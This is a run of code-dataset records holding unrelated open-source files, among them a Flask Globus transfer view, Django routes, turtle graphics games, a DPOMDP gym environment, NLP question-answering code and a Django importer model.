transfer_data = TransferData(transfer_client=transfer,\n source_endpoint=source_endpoint_id,\n destination_endpoint=destination_endpoint_id,\n label=browse_endpoint_form.get('label'))\n\n for ds in filtered_datasets:\n print(\"printing ds\")\n print(ds)\n if dirselect:\n source_path = source_endpoint_base + ds['path']\n else:\n source_path = source_endpoint_base + ds['path'] + \"/\" + ds['name']\n\n dest_path = browse_endpoint_form['path']\n\n if destination_folder:\n dest_path += destination_folder + '/'\n\n if dirselect:\n dest_path += ds['path'] + '/'\n else:\n dest_path += ds['path'] + '/' + ds['name']\n\n transfer_data.add_item(source_path=source_path,\n destination_path=dest_path,\n recursive=dirselect)\n\n transfer.endpoint_autoactivate(source_endpoint_id)\n transfer.endpoint_autoactivate(destination_endpoint_id)\n task_id = transfer.submit_transfer(transfer_data)['task_id']\n\n flash('Transfer request submitted successfully. Task ID: ' + task_id)\n\n return(redirect(url_for('transfer_status', task_id=task_id)))\n\n\n@app.route('/status/<task_id>', methods=['GET'])\n@authenticated\ndef transfer_status(task_id):\n \"\"\"\n Call Globus to get status/details of transfer with\n task_id.\n\n The target template (tranfer_status.jinja2) expects a Transfer API\n 'task' object.\n\n 'task_id' is passed to the route in the URL as 'task_id'.\n \"\"\"\n transfer_tokens = session['tokens']['transfer.api.globus.org']\n\n authorizer = RefreshTokenAuthorizer(\n transfer_tokens['refresh_token'],\n load_portal_client(),\n access_token=transfer_tokens['access_token'],\n expires_at=transfer_tokens['expires_at_seconds'])\n\n transfer = TransferClient(authorizer=authorizer)\n task = transfer.get_task(task_id)\n\n return render_template('transfer_status.jinja2', task=task)\n\n","repo_name":"LSSTDESC/desc-data-portal","sub_path":"web/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15847,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"92"} +{"seq_id":"17978867552","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"create\", views.create, name=\"create\"),\n path(\"random\", views.random_entry, name=\"random\"),\n path(\"wiki/not-found\", views.not_found, name=\"404\"),\n path(\"wiki/<str:name>\", views.show, name=\"show\"),\n path(\"wiki/<str:name>/edit\", views.edit, name=\"edit\")\n]\n","repo_name":"plovinicius/cs50w-wiki","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"33402254337","text":"\nimport os\n\nclass Screen:\n def __init__(self):\n print(\"screen module initialized\")\n self.brightness_interface = \"/sys/class/backlight/rpi_backlight/brightness\"\n self.is_on = True\n\n def change_brightness(self, value) -> bool:\n \"\"\"write a uint8 value to brightness interface\"\"\"\n with open(self.brightness_interface, 'w') as f:\n f.seek(0, os.SEEK_END)\n pos = f.tell()\n f.truncate(pos)\n f.write(str(value))\n return True\n\n @property\n def is_on(self) -> bool:\n return self.__is_on\n\n @is_on.setter\n def is_on(self, value : bool) -> bool:\n if type(value) is not bool:\n raise TypeError\n self.__is_on = value\n return self.__is_on\n \n\n\n\nif __name__ == \"__main__\":\n print(\"Running test on screen brightness\")\n s = Screen()\n s.change_brightness(100)","repo_name":"Spice-Weasel/tkinter-slideshow","sub_path":"screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12545810082","text":"\"\"\"add start_time field in rooms\n\nRevision ID: 4b8e19d6837f\nRevises: 66145020275c\nCreate Date: 2020-03-25 09:41:14.423042\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '4b8e19d6837f'\ndown_revision = '66145020275c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('rooms', sa.Column('start_time', sa.BigInteger(), nullable=True))\n\n\ndef downgrade():\n op.drop_column('rooms', 'start_time')\n","repo_name":"super1-chen/gamecenter","sub_path":"gamecenter/db/alembic/versions/4b8e19d6837f_add_start_time_field_in_rooms.py","file_name":"4b8e19d6837f_add_start_time_field_in_rooms.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"33005223692","text":"import random\n\ndef random_subset(n, k):\n mapping = {}\n\n for i in range(k):\n randindex = random.randint(i, n-1)\n m1 = mapping.get(randindex)\n m2 = mapping.get(i)\n\n if m1 == None and m2 == None:\n mapping[randindex] = i\n mapping[i] = randindex\n elif m1 == None and m2 != None:\n mapping[randindex] = m2\n mapping[i] = randindex\n elif m1 != None and m2 == None:\n mapping[i] = m1\n mapping[randindex] = i\n else:\n mapping[i] = m1\n mapping[randindex] = m2\n\n return list(mapping.values())[:k]\n\nn = int(input('Enter n: '))\nk = int(input('Enter k: '))\nprint(random_subset(n, k))\n","repo_name":"mismayil/epi","sub_path":"random_subset.py","file_name":"random_subset.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"34829525296","text":"\"\"\"\r\n# 14. 02. 15650. N과 M 2\r\n# DATE SOLVED: 22. 01. 05\r\n\r\n# COMMENTS:\r\n 자연수 N과 M이 주어졌을 때 중복 없이 M개를 고른 수열. 
\r\n 오름차순.\r\n\"\"\"\r\n\r\nimport sys\r\nN, M = map(int, sys.stdin.readline().split())\r\n\r\ndef DFS(array, k):\r\n if len(array) == M:\r\n print(\" \".join(map(str, array)))\r\n return\r\n\r\n for i in range(k, N + 1):\r\n if i not in array:\r\n array.append(i)\r\n DFS(array, i)\r\n array.pop()\r\n\r\narray = []\r\n\r\nDFS(array, 1)","repo_name":"tiobi/algorithm_study","sub_path":"BOJ/14.백트래킹/14.02.15650.N과M2.py","file_name":"14.02.15650.N과M2.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"25667027520","text":"import maya.cmds as cmds\nimport chModules.retargetTool.functions as fnc\n\ndef clearLocalData( target ):\n \n orientNodeCons = cmds.listConnections( target, type='retargetOrientNode' )\n transNodeCons = cmds.listConnections( target, type='retargetTransNode' )\n \n retargetNodes = []\n \n if orientNodeCons:\n retargetNodes.append( orientNodeCons[0] )\n if transNodeCons:\n retargetNodes.append( transNodeCons[0] )\n \n if retargetNodes:\n \n for retargetNode in retargetNodes:\n fnc.clearArrayElement( retargetNode+'.localData' )","repo_name":"kimsung9k/mayadev","sub_path":"maya_tools_backup/chRig/python/chModules/retargetTool/localEdit/localConnect.py","file_name":"localConnect.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"14220889304","text":"from transformers import pipeline\nimport tensorflow as tf\nimport transformers\nimport numpy as np\n#from googletrans import Translator\nimport pandas as pd \nimport re\nfrom google_trans_new import google_translator \n\nmax_length = 32 # Maximum length of input sentence to the model.\nbatch_size = 32\nepochs = 2\n\n# Labels in our dataset.\nlabels = [\"contradiction\", \"entailment\", \"neutral\"]\n\n\n\n\n\nclass BertSemanticDataGenerator(tf.keras.utils.Sequence):\n \"\"\"Generates batches of data.\n\n Args:\n sentence_pairs: Array of premise and hypothesis input sentences.\n labels: Array of labels.\n batch_size: Integer batch size.\n shuffle: boolean, whether to shuffle the data.\n include_targets: boolean, whether to incude the labels.\n\n Returns:\n Tuples `([input_ids, attention_mask, `token_type_ids], labels)`\n (or just `[input_ids, attention_mask, `token_type_ids]`\n if `include_targets=False`)\n \"\"\"\n\n def __init__(\n self,\n sentence_pairs,\n labels,\n batch_size=batch_size,\n shuffle=True,\n include_targets=True,\n truncation = True\n ):\n self.sentence_pairs = sentence_pairs\n self.labels = labels\n self.shuffle = shuffle\n self.batch_size = batch_size\n self.include_targets = include_targets\n # Load our BERT Tokenizer to encode the text.\n # We will use base-base-uncased pretrained model.\n self.tokenizer = transformers.BertTokenizer.from_pretrained(\n \"bert-base-uncased\", do_lower_case=True\n )\n self.indexes = np.arange(len(self.sentence_pairs))\n self.on_epoch_end()\n\n def __len__(self):\n # Denotes the number of batches per epoch.\n return len(self.sentence_pairs) // self.batch_size\n\n def __getitem__(self, idx):\n # Retrieves the batch of index.\n indexes = self.indexes[idx * self.batch_size : (idx + 1) * self.batch_size]\n sentence_pairs = self.sentence_pairs[indexes]\n\n # With BERT tokenizer's batch_encode_plus batch of both the sentences are\n # encoded together and separated by [SEP] token.\n encoded = self.tokenizer.batch_encode_plus(\n sentence_pairs.tolist(),\n add_special_tokens=True,\n 
max_length=max_length,\n return_attention_mask=True,\n return_token_type_ids=True,\n pad_to_max_length=True,\n return_tensors=\"tf\",\n truncation=True\n )\n #print(encoded)\n # Convert batch of encoded features to numpy array.\n input_ids = np.array(encoded[\"input_ids\"], dtype=\"int32\")\n attention_masks = np.array(encoded[\"attention_mask\"], dtype=\"int32\")\n token_type_ids = np.array(encoded[\"token_type_ids\"], dtype=\"int32\")\n\n # Set to true if data generator is used for training/validation.\n if self.include_targets:\n labels = np.array(self.labels[indexes], dtype=\"int32\")\n return [input_ids, attention_masks, token_type_ids], labels\n else:\n return [input_ids, attention_masks, token_type_ids]\n\n def on_epoch_end(self):\n # Shuffle indexes after each epoch if shuffle is set to True.\n if self.shuffle:\n np.random.RandomState(42).shuffle(self.indexes)\n\ndef create_model():\n #strategy = tf.distribute.MirroredStrategy()\n\n #with strategy.scope():\n # Encoded token ids from BERT tokenizer.\n input_ids = tf.keras.layers.Input(\n shape=(max_length,), dtype=tf.int32, name=\"input_ids\"\n )\n # Attention masks indicates to the model which tokens should be attended to.\n attention_masks = tf.keras.layers.Input(\n shape=(max_length,), dtype=tf.int32, name=\"attention_masks\"\n )\n # Token type ids are binary masks identifying different sequences in the model.\n token_type_ids = tf.keras.layers.Input(\n shape=(max_length,), dtype=tf.int32, name=\"token_type_ids\"\n )\n # Loading pretrained BERT model.\n\n bert_model = transformers.TFBertModel.from_pretrained(\"bert-base-uncased\")\n # Freeze the BERT model to reuse the pretrained features without modifying them.\n bert_model.trainable = False\n\n sequence_output, pooled_output = bert_model(\n input_ids, attention_mask=attention_masks, token_type_ids=token_type_ids\n )\n # Add trainable layers on top of frozen layers to adapt the pretrained features on the new data.\n bi_lstm = tf.keras.layers.Bidirectional(\n tf.keras.layers.LSTM(64, return_sequences=True)\n )(sequence_output)\n # Applying hybrid pooling approach to bi_lstm sequence output.\n avg_pool = tf.keras.layers.GlobalAveragePooling1D()(bi_lstm)\n max_pool = tf.keras.layers.GlobalMaxPooling1D()(bi_lstm)\n concat = tf.keras.layers.concatenate([avg_pool, max_pool])\n dropout = tf.keras.layers.Dropout(0.3)(concat)\n output = tf.keras.layers.Dense(3, activation=\"softmax\")(dropout)\n model = tf.keras.models.Model(\n inputs=[input_ids, attention_masks, token_type_ids], outputs=output\n )\n\n model.compile(\n optimizer=tf.keras.optimizers.Adam(),\n loss=\"categorical_crossentropy\",\n metrics=[\"acc\"],\n )\n return model\n\n\ndef check_similarity(sentence1, sentence2,model_question_answer):\n sentence_pairs = np.array([[str(sentence1), str(sentence2)]])\n test_data = BertSemanticDataGenerator(\n sentence_pairs, labels=None, batch_size=1, shuffle=False, include_targets=False,\n )\n\n proba = model_question_answer.predict(test_data)[0]\n idx = np.argmax(proba)\n proba = f\"{proba[idx]: .2f}%\"\n pred = labels[idx]\n return pred, proba\n\ndef question_answer(text,model_question_answer,fichier):\n translated = translate(text,src='fr', dest='en')\n liste_similarity=[]\n #print(\"translated\",translated)\n for i in range(len(fichier)):\n if len(liste_similarity) <3:\n pred,proba = check_similarity(fichier.iloc[i][0],translated,model_question_answer)\n #print(\"pred :\",pred,\"proba\",proba)\n if pred == \"entailment\":\n all_reponses = fichier.iloc[i][1]\n temp_liste = 
all_reponses.split(\"/\")\n for temp in temp_liste:\n liste_similarity.append(temp)\n else:\n return liste_similarity\n print(liste_similarity)\n return liste_similarity\n\n\n\n\n\ndef generate_sentences_french_gpt2(debut_phrase,num_return_sequences=1,length=20,temperature=1):\n response = french_generator(debut_phrase,num_return_sequences=1,max_length=length)\n liste = []\n for res in response:\n liste.append(res[\"generated_text\"])\n return liste\n\ndef translate(texte,src=\"en\",dest=\"fr\"):\n translator = google_translator() \n translate_text = translator.translate(texte,lang_tgt=dest) \n return translate_text\n\ndef generate_sentences_english_gpt2(debut_phrase,english_generator,num_return_sequences,length,top_p):\n debut_phrase = translate(debut_phrase,'fr',dest = 'en')\n\n response_debut_phrase = english_generator(debut_phrase,num_return_sequences=num_return_sequences,max_length=length,top_p=top_p,top_k=15,do_sample=True)\n liste = []\n for res in response_debut_phrase:\n print(\"res\",res)\n temp = translate(res[\"generated_text\"],'en',dest = 'fr')\n temp = truncate(temp)\n liste.append(temp)\n return liste\n\ndef truncate(string):\n strin_clean = re.sub('\\.(.*)', '.', string)\n strin_clean = re.sub('\\?(.*)', '?', strin_clean)\n strin_clean = re.sub('\\!(.*)', '!', strin_clean)\n return strin_clean\n\n\n#----------Load model to finish sentences gpt-2 french fine tune----------\n#french_generator = pipeline('text-generation',model='ml/modeles/gpt2-fine-tune', tokenizer='camembert-base')\n\n#----------Load model to finish sentences gpt2-english not fine tune----------\ndef load_english_generator():\n english_generator = pipeline('text-generation', model='gpt2')\n return english_generator\n\n#----------Load model for questions answer----------\ndef load_bert_model():\n model = create_model()\n path = \"ml/modeles/bert-question-reponses/weights\"\n model.load_weights(path)\n return model\n\ndef load_file():\n fichier = pd.read_csv(\"ml/dataset_questions_reponses.txt\", sep=\";\")\n return fichier","repo_name":"Nicolas-Thomazo/Alis_project","sub_path":"backend/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7312022424","text":"#Event Listners\n\n#from turtle import Turtle, Screen\n#ted=Turtle()\n#screen=Screen()\n#def move_fd():\n# ted.fd(10)\n#screen.listen()\n#screen.onkey(fun=move_fd,key=\"a\")\n#screen.exitonclick()\n\n#Etch-A Sketch app\n\n#from turtle import Turtle, Screen\n#ted=Turtle()\n#screen=Screen()\n#def move_right():\n# ted.fd(10)\n#def move_up():\n# ted.left(10)\n#def move_down():\n# ted.right(10)\n#def move_left():\n# ted.backward(10)\n#def Clear():\n# ted.clear()\n# ted.pu()\n# ted.home()\n#screen.listen()\n#screen.onkey(fun=move_right,key=\"d\")\n#screen.onkey(fun=move_left,key=\"a\")\n#screen.onkey(fun=move_up,key=\"w\")\n#screen.onkey(fun=move_down,key=\"x\")\n#screen.onkey(fun=Clear,key=\"c\")\n#screen.exitonclick()\n\n\nfrom turtle import Turtle, Screen\nimport random\nscreen=Screen()\nscreen.setup(500, 400)\ncolors=[\"red\",\"blue\",\"green\",\"yellow\",\"orange\",\"purple\"]\ny_coordinates=[60,30,0,-30,-60,-90]\nall_turtles=[]\nis_race=False\nuser_bet=screen.textinput(title=\"Make your bet.\", prompt=\"Which turtle will win the race? 
Enter a color: \")\nprint(user_bet)\nfor turtle_index in range(0,6):\n new_turtle = Turtle(shape=\"turtle\")\n new_turtle.color(colors[turtle_index])\n new_turtle.pu()\n new_turtle.goto(x=-230, y=y_coordinates[turtle_index])\n all_turtles.append(new_turtle)\nif user_bet:\n is_race=True\nwhile is_race:\n for turtle in all_turtles:\n if turtle.xcor()>230:\n is_race=False\n winner_color=turtle.pencolor()\n if user_bet==winner_color:\n print(f\"You've won and {winner_color} is the winning turtle.\")\n else:\n print(f\"You've lost and {winner_color} is the winning turtle.\")\n random_distance=random.randint(0,10)\n turtle.fd(random_distance)\nscreen.exitonclick()\n","repo_name":"Abcacode4r/pythonProject5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73033600939","text":"import os\nfrom rl_parsers.dpomdp import parse\nimport numpy as np\nimport gym\nfrom gym.utils import seeding\nfrom gym import spaces\n\nclass DPOMDP(gym.Env):\n \"\"\"Environment specified by DPOMDP file\"\"\"\n def __init__(self, path, episodic=False, seed=None):\n debug=False\n #debug = True if 'skewed' in path else False\n self.episodic = episodic\n self.seed(seed)\n with open(path) as f:\n model = parse(f.read(), debug=debug)\n\n self.discount = model.discount\n self.agents = len(model.agents)\n self.state_space = spaces.Discrete(len(model.states))\n self.action_space = [spaces.Discrete(len(aAct)) for aAct in model.actions] # Space for each agent\n self.observation_space = [spaces.Discrete(len(aObs)) for aObs in model.observations] # Obs space for each agent\n self.reward_range = model.R.min(), model.R.max()\n if model.start is None:\n self.start = np.full(self.state_space.n, 1 / self.state_space.n)\n else:\n self.start = model.start\n\n # Start-state, agent actions, end state\n self.T = model.T.transpose(self.agents, *(np.arange(self.agents)), self.agents+1).copy()\n # Start, agent actions, end, agent observations\n self.O = np.stack([model.O] * self.state_space.n)\n # Start-state, agent actions, end state, agent observations\n self.R = model.R.transpose(self.agents, *(np.arange(self.agents)), self.agents+1, *(np.arange(self.agents)+self.agents+2)).copy()\n\n if episodic:\n self.D = model.reset.T.copy() # only if episodic\n\n self.state = None\n\n def seed(self, seed):\n self.np_random, seed_ = seeding.np_random(seed)\n return [seed_]\n\n def reset(self):\n self.state = self.np_random.multinomial(1, self.start).argmax().item()\n\n # Take an nparray or tuple of actions, not just 1\n def step(self, actions):\n assert self.state is not None, 'State has not been initialized'\n if isinstance(actions, (list, tuple)):\n assert len(actions) == self.agents, 'Must provide joint action'\n else:\n assert actions.shape[0] == self.agents, 'Must provide joint action'\n\n state1 = self.np_random.multinomial(\n 1, self.T[self.state, (*actions)]).argmax().item()\n # Need to get the joint obs. 
The last indices are obs for agents 1, 2, etc\n # Flatten those indices (they sum to 1), draw a number, unflatten\n # So obs is a tuple of length (numAgents)\n obs = np.unravel_index(self.np_random.multinomial(1, self.O[self.state, (*actions), state1].flatten()).argmax(),\n tuple([oSpace.n for oSpace in self.observation_space]))\n reward = self.R[self.state, (*actions), state1, (*obs)].item()\n\n if self.episodic:\n done = self.D[self.state, (*actions)]\n else:\n done = False\n\n if done:\n self.state = None\n else:\n self.state = state1\n\n return obs, reward, done, {}\n","repo_name":"shrivastava-piyush/G-DICE","sub_path":"gym_dpomdps/gym_dpomdps/envs/dpomdp.py","file_name":"dpomdp.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"24919783095","text":"#!/usr/bin/env python\n\n\"\"\"\nUsage:\n\n ./ens2json infile\n\nAim:\n\nCreate useful information about ensembles in JSON format. This is intended\nfor internal/CXC use, so there is no guarantee on the format of if this\ninformation is valid. Output is to the screen.\n\n\"\"\"\n\nimport json\n\nfrom coords.utils import calculate_nominal_position\n\n\ndef stk2coord(stack):\n \"\"\"Get the stack center from the name\"\"\"\n\n assert stack.startswith('acisfJ') or stack.startswith('hrcfJ'), \\\n stack\n assert stack.endswith('_001'), stack\n\n idx = stack.find('J')\n cstr = stack[idx + 1:-4]\n\n sign = cstr[7]\n assert sign in \"mp\", stack\n rstr = cstr[:7]\n dstr = cstr[8:]\n\n rah = int(rstr[0:2])\n ram = int(rstr[2:4])\n ras = int(rstr[4:]) / 10\n ra = 15.0 * (rah + (ram + (ras / 60.0)) / 60.0)\n\n decd = int(dstr[0:2])\n decm = int(dstr[2:4])\n decs = int(dstr[4:])\n dec = decd + (decm + (decs / 60.0)) / 60.0\n\n if sign == 'm':\n dec *= -1\n\n return [ra, dec]\n\n\ndef coords2center(cs):\n \"\"\"Convert a list of ra,dec values to a 'center'\n\n Just \"average\" the positions, but we do have at least one\n ensemble which straddles ra=0/360, so can not employ a\n cartesian approximation.\n\n Parameters\n ----------\n cs : sequence of (ra, dec) pairs\n The RA and Dec values are in decimal degrees\n\n Returns\n -------\n obj : dict\n Has keys ra and dec\n\n \"\"\"\n\n ras = [p[0] for p in cs]\n decs = [p[1] for p in cs]\n ra, dec = calculate_nominal_position(ras, decs)\n return {'ra': ra, 'dec': dec}\n\n\ndef clean(ensemble):\n \"\"\"Grab the actual ensemble value.\n\n This makes it a little easier for me downstream.\n \"\"\"\n\n assert ensemble.startswith('ens'), ensemble\n assert ensemble.endswith('00_001'), ensemble\n return int(ensemble[3:-6])\n\n\ndef convert(infile):\n\n store = {}\n coords = []\n with open(infile, 'r') as fh:\n for l in fh.readlines():\n l = l.strip()\n if l == '' or l.startswith('#'):\n continue\n\n toks = l.split()\n assert len(toks) == 4, l\n nstk = int(toks[1])\n ctr = int(toks[2])\n stk = toks[3]\n\n if ctr == 1:\n assert coords == []\n\n coords.append(stk2coord(stk))\n\n if ctr == nstk:\n center = coords2center(coords)\n ens = clean(toks[0])\n store[ens] = center\n coords = []\n\n assert coords == []\n print(json.dumps(store))\n\n\nif __name__ == \"__main__\":\n\n import sys\n if len(sys.argv) != 2:\n sys.stderr.write(\"Usage: {} infile\\n\".format(sys.argv[0]))\n sys.exit(1)\n\n 
convert(sys.argv[1])\n","repo_name":"cxcsds/cscwwt","sub_path":"code/ens2json.py","file_name":"ens2json.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"1193108839","text":"import os \nimport sys \nsys.path.insert(0, os.path.abspath('../../my_bot'))\n\n# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = 'game'\ncopyright = '2023, linseypy, rivenmau, falarm'\nauthor = 'linseypy, rivenmau, falarm'\nrelease = '1.0.0'\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\"sphinx.ext.autodoc\", \"sphinx.ext.napoleon\", 'sphinx.ext.coverage',]\n\nautodoc_default_options = {\n 'undoc-members': True,\n 'show-inheritance': True,\n}\n\n# Стиль docstrings (в данном случае, Google-style)\nnapoleon_google_docstring = True\nnapoleon_use_param = True\nnapoleon_use_ivar = True\nnapoleon_use_rtype = True\n\ntemplates_path = ['_templates']\nexclude_patterns = []\n\nlanguage = 'en'\n\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = 'sphinx_rtd_theme'\nhtml_static_path = ['_static']\n","repo_name":"Fuse23/python_bootcamp","sub_path":"Team01/src/docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22041165669","text":"import turtle as t\nimport math\nt.speed(100)\nt.up()\n\n\ndef square(a, color):\n ''' Русует квадрат стороной - а, возвращает в начальное положение + цвет '''\n t.down()\n t.color(color)\n t.begin_fill()\n for g in range(4):\n t.forward(a)\n t.right(90)\n t.end_fill()\n t.up()\n\n\ndef triangle(a, color):\n ''' Рисует р\\б, п\\у треугольник + цвета '''\n t.color(color)\n t.begin_fill()\n t.down()\n t.right(45)\n t.forward(a)\n t.left(90)\n t.forward(a)\n t.left(135)\n t.forward(math.sqrt(a ** 2 * 2))\n t.end_fill()\n t.up()\n t.left(180)\n\n\ndef main(a, b):\n ''' Главная фигура, координаты а,в '''\n # Рисуем каркас основной фигуры\n t.goto(a, b)\n square(10, 'black')\n t.goto(a + 90, b)\n square(10, 'black')\n t.goto(a, b - 90)\n square(10, 'black')\n t.goto(a + 90, b - 90)\n square(10, 'black')\n t.goto(a, b)\n t.down()\n t.right(45)\n t.forward(math.sqrt(20000))\n t.up()\n t.goto(a, b - 100)\n t.left(90)\n t.down()\n t.forward(math.sqrt(20000))\n t.right(45)\n t.up()\n t.goto(a + 40, b - 40)\n square(20, 'black')\n t.goto(a + 45, b - 45)\n square(10, 'white')\n # Каркас закончен\n\n # Рисуем галочки внутри фигуры\n t.goto(a, b)\n t.forward(20)\n triangle(math.sqrt(1800), 'red')\n t.goto(a, b)\n t.forward(30)\n triangle(math.sqrt(800), 'black')\n t.goto(a, b)\n t.forward(40)\n triangle(math.sqrt(200), 'white')\n # Верх - конец\n\n t.goto(a, b - 80)\n t.left(90)\n triangle(math.sqrt(1800), 'red')\n t.goto(a, b - 70)\n triangle(math.sqrt(800), 'black')\n t.goto(a, b - 60)\n triangle(math.sqrt(200), 'white')\n t.right(90)\n # Лево - конец\n\n t.goto(a + 100, 
b)\n t.right(90)\n t.forward(20)\n triangle(math.sqrt(1800), 'red')\n t.goto(a + 100, b)\n t.forward(30)\n triangle(math.sqrt(800), 'black')\n t.goto(a + 100, b)\n t.forward(40)\n triangle(math.sqrt(200), 'white')\n t.left(90)\n # Право - конец\n\n t.goto(a + 100, b - 100)\n t.left(180)\n t.forward(20)\n triangle(math.sqrt(1800), 'red')\n t.goto(a + 100, b - 100)\n t.forward(30)\n triangle(math.sqrt(800), 'black')\n t.goto(a + 100, b - 100)\n t.forward(40)\n triangle(math.sqrt(200), 'white')\n t.right(180)\n # Низ - конец\n\n\ndef cvetok(a, b, color):\n ''' Рисует цветок. а,в - координаты + цвет'''\n t.goto(a, b)\n t.down()\n square(15, color)\n t.down()\n t.goto(a + 7.5, b - 7.5)\n t.left(45)\n t.width(2)\n t.color('white')\n t.forward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.backward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.left(90)\n t.forward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.backward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.left(90)\n t.forward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.backward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.left(90)\n t.forward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.up()\n t.left(45)\n t.goto(a + 7.5, b - 10.5)\n t.color('yellow')\n t.begin_fill()\n t.circle(3)\n t.end_fill()\n t.up()\n\n\ndef ramkaside(a, b, color):\n ''' Рисует сторону рамки, а в - начало координат + цвет '''\n t.goto(a, b)\n t.width(2)\n t.color('black')\n t.down()\n t.forward(400)\n t.backward(400)\n t.color(color)\n t.begin_fill()\n for r in range(10):\n t.right(45)\n t.forward(math.sqrt(800))\n t.left(90)\n t.forward(math.sqrt(800))\n t.right(45)\n t.end_fill()\n t.color('black')\n t.backward(400)\n for r in range(10):\n t.right(45)\n t.forward(math.sqrt(800))\n t.left(90)\n t.forward(math.sqrt(800))\n t.right(45)\n t.width(1)\n\n\n# Рисуем 9 основных фигур\nmain(0, 0)\nmain(100, 0)\nmain(-100, 0)\nmain(-100, -100)\nmain(0, -100)\nmain(100, -100)\nmain(-100, 100)\nmain(0, 100)\nmain(100, 100)\n# Конец\n\n# Обведем чтоб получше выглядело\nt.goto(-100, -200)\nt.left(90)\nt.down()\nt.color('black')\nt.forward(300)\nt.right(90)\nt.forward(300)\nt.right(90)\nt.forward(300)\nt.right(90)\nt.forward(300)\nt.right(180)\nt.up()\n\n# Рисуем цветочки\ncvetok(-120, -42.5, 'red')\ncvetok(-120, -142.50, 'red')\ncvetok(-120, 57.5, 'red')\n# Лево - конец\ncvetok(-57.5, 120, 'orange')\ncvetok(-57.5 + 100, 120, 'orange')\ncvetok(-57.5 + 200, 120, 'orange')\n# Верх - конец\ncvetok(205, 57.5, 'purple')\ncvetok(205, -42.5, 'purple')\ncvetok(205, -142.5, 'purple')\n# Право - конец\ncvetok(-57.5, -205, 'blue')\ncvetok(-57.5 + 100, -205, 'blue')\ncvetok(-57.5 + 200, -205, 'blue')\n# Низ - конец\n\n# Рисуем рамку\nramkaside(-150, 150, 'orange')\nt.right(90)\n# Верх - конец\nramkaside(250, 150, 'purple')\nt.right(90)\n# Право - конец\nramkaside(250, -250, 'blue')\nt.right(90)\n# Низ -конец\nramkaside(-150, -250, 'red')\n# Лево - конец\n\nt.right(90)\nt.done()\n","repo_name":"wartedorb/project1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"5282939287","text":"# coding=utf-8\n\"\"\"\nGeoSight is UNICEF's geospatial web-based business intelligence platform.\n\nContact : geosight-no-reply@unicef.org\n\n.. 
note:: This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU Affero General Public License as published by\n the Free Software Foundation; either version 3 of the License, or\n (at your option) any later version.\n\n\"\"\"\n__author__ = 'irwan@kartoza.com'\n__date__ = '13/06/2023'\n__copyright__ = ('Copyright 2023, Unicef')\n\nfrom django.conf import settings\nfrom django.contrib.gis.db import models\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom core.models.preferences import SitePreferences\nfrom geosight.importer.models.importer import Importer\n\n\nclass LogStatus(object):\n \"\"\"Quick access for coupling variable with Log status string.\"\"\"\n\n START = 'Start'\n RUNNING = 'Running'\n FAILED = 'Failed'\n SUCCESS = 'Success'\n\n\nclass ImporterLog(models.Model):\n \"\"\"History of Importer.\"\"\"\n\n importer = models.ForeignKey(Importer, on_delete=models.CASCADE)\n start_time = models.DateTimeField(auto_now_add=True)\n end_time = models.DateTimeField(blank=True, null=True)\n progress = models.IntegerField(default=0)\n status = models.CharField(\n max_length=100,\n choices=(\n (LogStatus.START, _(LogStatus.START)),\n (LogStatus.RUNNING, _(LogStatus.RUNNING)),\n (LogStatus.FAILED, 